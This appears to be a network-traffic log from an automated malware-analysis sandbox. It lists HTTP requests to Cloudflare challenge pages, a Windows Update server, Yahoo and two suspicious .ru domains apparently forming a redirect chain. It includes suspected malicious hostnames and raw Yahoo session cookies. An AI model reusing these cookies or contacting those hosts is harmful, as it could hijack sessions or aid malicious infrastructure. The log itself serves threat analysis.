Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/194391686:1727712828:JRtCI2iqmwXzQ6uA9YbttRQhBtGvVV2Rs_-r0xzpao4/8cb5e237ab880f47/1bf49d3282149e4 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8cb5e237ab880f47/1727716828536/ZTYaatjzYFSdFEX HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/yzcnc/0x4AAAAAAAj4CaQsDLLGC_TE/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8cb5e237ab880f47/1727716828536/c2b18accbaf5c30c53f58bad056d43b5ae357f2f43e8d35f1e70e5782f867ef2/F8ziSgnx8g5pQQx HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/yzcnc/0x4AAAAAAAj4CaQsDLLGC_TE/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8cb5e237ab880f47/1727716828536/ZTYaatjzYFSdFEX HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=LrkSUHRE2Sx57my&MD=btZSeAEe HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/194391686:1727712828:JRtCI2iqmwXzQ6uA9YbttRQhBtGvVV2Rs_-r0xzpao4/8cb5e237ab880f47/1bf49d3282149e4 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/194391686:1727712828:JRtCI2iqmwXzQ6uA9YbttRQhBtGvVV2Rs_-r0xzpao4/8cb5e237ab880f47/1bf49d3282149e4 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /dyxqqctqfxmdjbdkrdklknqcEsIhjbfqHMJIASFGXPYJHJHBMKSVBSWCVNJCXIPDVXPZRGDUP HTTP/1.1Host: ht4hkoldfwqkuse7qoti8nr4vfbfcgkyagnd3phsgq5swccnhjjxv.hocklahro.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://hfj.rontishet.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://hfj.rontishet.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /dyxqqctqfxmdjbdkrdklknqcEsIhjbfqHMJIASFGXPYJHJHBMKSVBSWCVNJCXIPDVXPZRGDUP HTTP/1.1Host: ht4hkoldfwqkuse7qoti8nr4vfbfcgkyagnd3phsgq5swccnhjjxv.hocklahro.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://hfj.rontishet.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.yahoo.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://hfj.rontishet.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-loader-2.7.21-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cv/apiv2/ngy-fonts/YahooSans-VF-Web.woff2 HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/sVHMxKrPePA197woLBKrVg--~B/Zmk9c3RyaW07aD0yNzI7cT05NTt3PTU2MDthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-09/f1738c10-7f1f-11ef-b7bf-d9a760ad838d.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /info/p.gif?apptype=default&beaconType=pageRenderStart&code=pageRender&bucket=900%2Cseamless&device=desktop&intl=us&rid=1pa4ckpjflnfm&site=fp&t=1727716855082 HTTP/1.1Host: www.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/RonKuGAd5Xs1CsylZkR9Og--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-09/88364cc0-7f3c-11ef-9e6d-608bb5010780.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/d2s6nYW_YMTX2VM1IGOKBQ--~B/Zmk9c3RyaW07aD0yODQ7cT04MDt3PTUzNjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/the_hill_articles_341/05f082c3610c0f639765aa4d2e67e189.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pv/static/ms/trendingNow.yhome-atomic.c9493b0439b3a8ef64a3f6b7f532117c.min.css HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /version/6.4.1/cmp.js HTTP/1.1Host: consent.cmp.oath.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ybar/cerebro_min.js HTTP/1.1Host: edge-mcdn.secure.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw
Source: global trafficHTTP traffic detected: GET /pv/static/ms/trendingNow-flameIcon.yhome-variable.a2368adb8251677d29ac1399a6f34c43.min.css HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /info/p.gif?apptype=default&beaconType=pageRenderEnd&code=pageRender&bucket=900%2Cseamless&device=desktop&intl=us&rid=1pa4ckpjflnfm&site=fp&t=1727716855086 HTTP/1.1Host: www.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/PfuFkSI.w9qemWReAv.2kA--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-09/a0026210-7f1b-11ef-92ab-b839323afb9a.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-loader-2.7.21-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/tQ8F_aqdd1MTiJBsUnvEUw--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-09/35a87f10-7eff-11ef-b37e-1db661b209fc.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/D1cC99bQYm9QVoUbD_Rpnw--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/usa_today_tech_153/03d01cbdd7ccafd738da286245b9f503.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/EP05qSSZkDRwnsJtEV.Bmw--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-09/84608c70-7f17-11ef-bfc7-ce05e04ea18c.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ss/analytics-3.54.3.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pv/static/img/icon-flame-light-202303010352.gif HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://s.yimg.com/pv/static/ms/trendingNow.yhome-atomic.c9493b0439b3a8ef64a3f6b7f532117c.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/RonKuGAd5Xs1CsylZkR9Og--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-09/88364cc0-7f3c-11ef-9e6d-608bb5010780.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/d2s6nYW_YMTX2VM1IGOKBQ--~B/Zmk9c3RyaW07aD0yODQ7cT04MDt3PTUzNjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/the_hill_articles_341/05f082c3610c0f639765aa4d2e67e189.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ybar/cerebro_min.js HTTP/1.1Host: edge-mcdn.secure.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/sVHMxKrPePA197woLBKrVg--~B/Zmk9c3RyaW07aD0yNzI7cT05NTt3PTU2MDthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-09/f1738c10-7f1f-11ef-b7bf-d9a760ad838d.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /v1/consentRecord?consentTypes=iab%2CiabCCPA%2Cgpp%2CgppSid HTTP/1.1Host: guce.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.yahoo.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw
